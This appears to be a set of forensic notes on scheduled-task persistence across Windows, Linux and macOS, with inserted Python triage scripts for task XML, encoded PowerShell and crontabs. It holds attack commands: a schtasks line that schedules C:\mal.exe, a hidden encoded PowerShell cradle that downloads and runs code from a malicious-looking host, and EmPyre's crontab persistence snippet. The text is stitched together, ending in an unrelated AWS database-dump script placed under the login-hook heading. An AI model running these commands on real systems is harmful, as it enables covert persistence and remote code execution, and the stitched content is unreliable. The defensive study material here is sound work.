Windows
❗️ Both at and schtasks.exe can create tasks remotely.
🏺 Artefacts:
- 🪵 Event Log: Task Scheduler Operational.
- 🛠️ autoruns
- 📂 C:\Windows\Tasks\*.job
- 📂 C:\Windows\SchedLgU.txt (Win XP)
- 📂 C:\Windows\System32\Tasks
at
at.exe (deprecated but can still be used) and schtasks.exe. For at, see at*.job and SchedLgU.txt.
WinXP: at jobs run with SYSTEM privileges.
Files are created here: \Windows\Tasks and \Windows\System32\Tasks (XML duplicate, Win7+). Created with: at.exe 22:22:22 C:\mal.exe, or with schtasks.exe (next section).
Artefact paths:
```
C:\Windows\Tasks\*.job
C:\Windows\SchedLgU.txt # Win XP
```
schtasks.exe
```
schtasks.exe /create /sc daily /tn winsvchost /tr C:\mal.exe /st 09:10:00
```
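A task registered this way leaves an XML file under C:\Windows\System32\Tasks, and pulling the registration, trigger, principal and action fields out of that file is the quickest way to triage it. The following is an added example, not code from the page: the sample document is constructed to mirror a task created with the schtasks command above, and the element names and namespace are those of the Task Scheduler XML schema. The `review` heuristics (LocalSystem principal, highest-privilege run level, command outside Windows or Program Files) are this example's own assumptions about what deserves a second look.

```python
# Added example (not from the page): triage of a Task Scheduler XML file such as the
# ones stored under C:\Windows\System32\Tasks. SAMPLE_TASK_XML is constructed to look
# like a task registered with schtasks /create; the review rules are assumptions.
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
LOCAL_SYSTEM = "S-1-5-18"
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Author>WORKSTATION\bob</Author>
    <Date>2024-01-01T09:05:00</Date>
  </RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2024-01-01T09:10:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\mal.exe</Command>
    </Exec>
  </Actions>
</Task>
"""


def _text(root, path):
    el = root.find(path, NS)
    return el.text.strip() if el is not None and el.text else None


def parse_task(data):
    """Return the registration, trigger, principal and action details of one task."""
    root = ET.fromstring(data)  # bytes keep the file's own encoding; str is parsed as-is
    return {
        "author": _text(root, "t:RegistrationInfo/t:Author"),
        "registered": _text(root, "t:RegistrationInfo/t:Date"),
        "start": _text(root, ".//t:StartBoundary"),
        "user_id": _text(root, ".//t:Principal/t:UserId"),
        "run_level": _text(root, ".//t:Principal/t:RunLevel"),
        "command": _text(root, "t:Actions/t:Exec/t:Command"),
        "arguments": _text(root, "t:Actions/t:Exec/t:Arguments"),
    }


def review(task):
    """Plain-language notes a responder would want next to the parsed fields."""
    notes = []
    if task["user_id"] == LOCAL_SYSTEM:
        notes.append("runs as LocalSystem")
    if task["run_level"] == "HighestAvailable":
        notes.append("requests highest available privileges")
    cmd = (task["command"] or "").lower().strip('"')
    if cmd and not cmd.startswith(TRUSTED_PREFIXES):
        notes.append("command outside Windows/Program Files: " + task["command"])
    return notes


def load_task_file(path):
    # Real task files are UTF-16 with a BOM; handing the raw bytes to the parser
    # lets it honour the declared encoding.
    with open(path, "rb") as fh:
        return parse_task(fh.read())


if __name__ == "__main__":
    t = parse_task(SAMPLE_TASK_XML)
    for k, v in t.items():
        print(f"{k:>11}: {v}")
    print("notes:", "; ".join(review(t)))
```

Run over a whole tree with `load_task_file` per file and compare the `registered` dates and authors against the Task Scheduler Operational log; a task whose XML exists on disk but has no matching registration event is worth a closer look.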
WMI
📕 RTFM
An attempt to be stealthy:
```
powershell -W Hidden -nop -noni -ec <base64something> # Shows neither a PowerShell window nor any output. The script to execute is base64 encoded.
# W    WindowStyle = Hidden
# nop  NoProfile: does not load the PS profile
# noni NonInteractive: no interactive prompt is presented to the user
# ec   EncodedCommand: the base64-encoded script
# a popular string to download stuff from the Internet
IEX (New-Object System.Net.WebClient).downloadstring('http://somethingmalicious.com/file')
```
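On the defensive side the interesting part is that the encoded script is recoverable from any process-creation record that captured the command line (Sysmon event 1, or 4688 with command-line auditing enabled): `-EncodedCommand` is just base64 over the UTF-16LE script text. The block below is an added example, not from the page or any tool it names; it decodes that argument, records the hidden-window, no-profile and non-interactive flags, and lists download-cradle strings found in the script. The sample command line is constructed here, with `example.invalid` standing in for a real host, and the marker list is this example's own.

```python
# Added example (not from the page): decode the -EncodedCommand argument of a logged
# PowerShell command line and note the flags and cradle strings worth a second look.
# SAMPLE_SCRIPT/SAMPLE_CMDLINE are constructed; CRADLE_MARKERS is an assumed watch list.
import base64
import shlex

# Strings that commonly appear in download cradles; matched case-insensitively.
CRADLE_MARKERS = ("IEX", "Invoke-Expression", "DownloadString", "DownloadFile",
                  "Net.WebClient", "Invoke-WebRequest", "FromBase64String")

SAMPLE_SCRIPT = "IEX (New-Object System.Net.WebClient).DownloadString('http://example.invalid/file')"


def encode_command(script):
    """-EncodedCommand expects base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(b64):
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


SAMPLE_CMDLINE = "powershell -W Hidden -nop -noni -ec " + encode_command(SAMPLE_SCRIPT)


def _is_param(token, *names):
    """powershell.exe accepts any unambiguous prefix of a parameter name (-w, -nop, -noni),
    plus the documented short form -ec for -EncodedCommand."""
    if not token.startswith("-") or len(token) < 2:
        return False
    key = token[1:].lower()
    return any(n.startswith(key) for n in names)


def analyze_powershell(cmdline):
    # posix=False keeps Windows path backslashes intact; quotes stay on the tokens
    tokens = shlex.split(cmdline, posix=False)
    result = {"hidden": False, "noprofile": False, "noninteractive": False,
              "script": None, "indicators": []}
    for i, tok in enumerate(tokens):
        nxt = tokens[i + 1].strip('"\'') if i + 1 < len(tokens) else ""
        if _is_param(tok, "encodedcommand", "ec") and nxt:
            result["script"] = decode_command(nxt)
        elif _is_param(tok, "windowstyle") and nxt.lower() == "hidden":
            result["hidden"] = True
        elif _is_param(tok, "noprofile"):       # checked before noninteractive: -n alone is ambiguous
            result["noprofile"] = True
        elif _is_param(tok, "noninteractive"):
            result["noninteractive"] = True
    if result["script"]:
        low = result["script"].lower()
        result["indicators"] = [m for m in CRADLE_MARKERS if m.lower() in low]
    return result


if __name__ == "__main__":
    r = analyze_powershell(SAMPLE_CMDLINE)
    print("decoded script :", r["script"])
    print("hidden/nop/noni:", r["hidden"], r["noprofile"], r["noninteractive"])
    print("indicators     :", ", ".join(r["indicators"]) or "none")
```

The decoded text, not the base64 blob, is what should be matched by detection rules and kept in the case notes; the same encoding trick also hides the IEX cradle above from naive string searches on the raw command line.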
Linux
/etc/cron*
/var/spool/crontabs
/var/spool/atjobs
/etc/anacron
macOS
Cron
/usr/bin/crontab
Post-exploitation RT tool EmPyre has a module to exploit this technique.
```python
import subprocess

# %s is filled in at runtime with the path of the item to persist
cmd = 'crontab -l | { cat; echo "0 * * * * %s"; } | crontab -'
subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
```
The cat and echo commands append the new command. The %s in the cmd variable will be updated at runtime with the path of the item to persist, and the 0 * * * * component instructs macOS to execute the job every hour. The crontab - will reinstall any existing jobs, along with the new one.
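Reading the other way round, a reviewer going through `crontab -l` output (or the spool files under /var/spool/cron* and /var/spool/crontabs listed in the Linux section) wants each line split into its five time fields and its command, with the common schedules named and the placement of the command checked. The block below is an added example, not from the page or from EmPyre: the crontab text is constructed, and the review rules (scratch directories, hidden path components, commands resolved through PATH) are this example's own assumptions about what merits a look.

```python
# Added example (not from the page): parse `crontab -l` output or a cron spool file,
# describe each job's schedule and flag where its command lives. SAMPLE_CRONTAB is
# constructed; the review rules are assumptions, not a complete detection policy.

SAMPLE_CRONTAB = """\
# constructed sample of `crontab -l` for one user
SHELL=/bin/sh
MAILTO=""
30 2 * * 1-5 /usr/local/bin/backup.sh --quiet
@reboot /usr/local/bin/agent --daemon
0 * * * * /Users/alice/Library/.cache/update
"""

FIELDS = ("minute", "hour", "day_of_month", "month", "day_of_week")
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/private/tmp/", "/dev/shm/")


def parse_crontab(text):
    """Return one dict per job line; comments, blanks and VAR=value lines are skipped."""
    jobs = []
    for lineno, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        first = s.split(None, 1)[0]
        if "=" in first and not first.startswith("@"):
            continue  # environment assignment such as SHELL=/bin/sh
        if s.startswith("@"):                 # @reboot, @hourly, ... shorthand
            special, _, command = s.partition(" ")
            schedule = {"special": special}
        else:
            parts = s.split(None, 5)
            if len(parts) < 6:
                raise ValueError(f"line {lineno}: expected 5 time fields and a command")
            schedule = dict(zip(FIELDS, parts[:5]))
            command = parts[5]
        jobs.append({"line": lineno, "schedule": schedule, "command": command.strip()})
    return jobs


def describe(schedule):
    """Human-readable reading for the common shapes; falls back to the raw fields."""
    if "special" in schedule:
        return schedule["special"]
    m, h, dom, mon, dow = (schedule[f] for f in FIELDS)
    if (dom, mon, dow) == ("*", "*", "*"):
        if (m, h) == ("*", "*"):
            return "every minute"
        if h == "*" and m.isdigit():
            return f"every hour at minute {int(m)}"
        if m.isdigit() and h.isdigit():
            return f"daily at {int(h):02d}:{int(m):02d}"
    return "fields " + " ".join(schedule[f] for f in FIELDS)


def review(job):
    """Notes on where the command lives, not on what it does."""
    notes = []
    cmd = job["command"]
    exe = cmd.split()[0] if cmd else ""
    if exe.startswith(SCRATCH_DIRS):
        notes.append(f"runs from a scratch directory: {exe}")
    hidden = [p for p in exe.split("/") if p.startswith(".") and p not in (".", "..")]
    if hidden:
        notes.append("hidden path component: " + ", ".join(hidden))
    if exe and not exe.startswith("/"):
        notes.append(f"relative command name, resolved through PATH: {exe}")
    return notes


if __name__ == "__main__":
    for job in parse_crontab(SAMPLE_CRONTAB):
        print(f"line {job['line']}: {describe(job['schedule'])} -> {job['command']}")
        for note in review(job):
            print("    !", note)
```

The hourly entry appended by the EmPyre snippet shows up here as `every hour at minute 0`, and whatever it points at is judged by its path; for system-wide files under /etc/cron.d the lines carry an extra user field before the command, which this parser does not model.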
At
at jobs are stored in the /private/var/at/jobs/ directory; enumerate them via the /usr/bin/atq utility.
❗️ On a default install of macOS, the at scheduler, /usr/libexec/atrun, is disabled. However, malware can enable it with 👑 root privileges with the following command: launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist.
After enabling this scheduler, malware can create an at job by simply piping persistent commands into /usr/bin/at, specifying the time and date of execution.
Not a popular technique.
Periodic
/etc/periodic
Though this directory is owned by root, malware with adequate privileges may be able to create (or subvert) a periodic script in order to achieve persistence at regular intervals.
“What is the difference between ‘periodic’ and ‘cron’ on OS X?” https://superuser.com/questions/391204/what-is-the-difference-between-periodic-and-cron-on-os-x/
Login and Logout Hooks
Look for either LoginHook or LogoutHook in the following plist:
~/Library/Preferences/com.apple.loginwindow.plist
📕 RTFM
```bash
#!/bin/bash
# Backup of the users table: credentials come from Secrets Manager, the dump is
# encrypted with a KMS key and uploaded to S3; nothing stays on local disk afterwards.
export FILENAME=$(date +"%s")
# IMDSv2: obtain a short-lived session token, then use it to read the instance region
export METADATA_TOKEN=$(curl -s -X PUT -H 'X-aws-ec2-metadata-token-ttl-seconds: 120' http://169.254.169.254/latest/api/token)
export AWS_REGION=$(curl -s -H "X-aws-ec2-metadata-token: $METADATA_TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document | jq -r '.region')
# Database credentials are fetched at run time rather than stored in the script
export DB_SECRETS=$(aws secretsmanager get-secret-value --secret-id $(unique_string)/database --region $AWS_REGION | jq -r '.SecretString')
export DB_USERNAME=$(echo $DB_SECRETS | jq -r '.username')
export DB_NAME=$(echo $DB_SECRETS | jq -r '.name')
export DB_HOST=$(echo $DB_SECRETS | jq -r '.endpoint' | cut -d: -f1)
export DB_PASSWORD=$(echo $DB_SECRETS | jq -r '.password')
# MYSQL_PWD keeps the password out of the process command line
MYSQL_PWD=$DB_PASSWORD mysqldump --databases $DB_NAME --tables users -u $DB_USERNAME -h $DB_HOST > /tmp/$FILENAME.sql
aws kms encrypt --key-id alias/backup-$(unique_string) --plaintext fileb:///tmp/$FILENAME.sql --region $AWS_REGION | jq -r '.CiphertextBlob' > /tmp/$FILENAME.sql.enc
aws s3 cp /tmp/$FILENAME.sql.enc s3://sec510-backup-$(unique_string)
rm /tmp/$FILENAME.sql*
```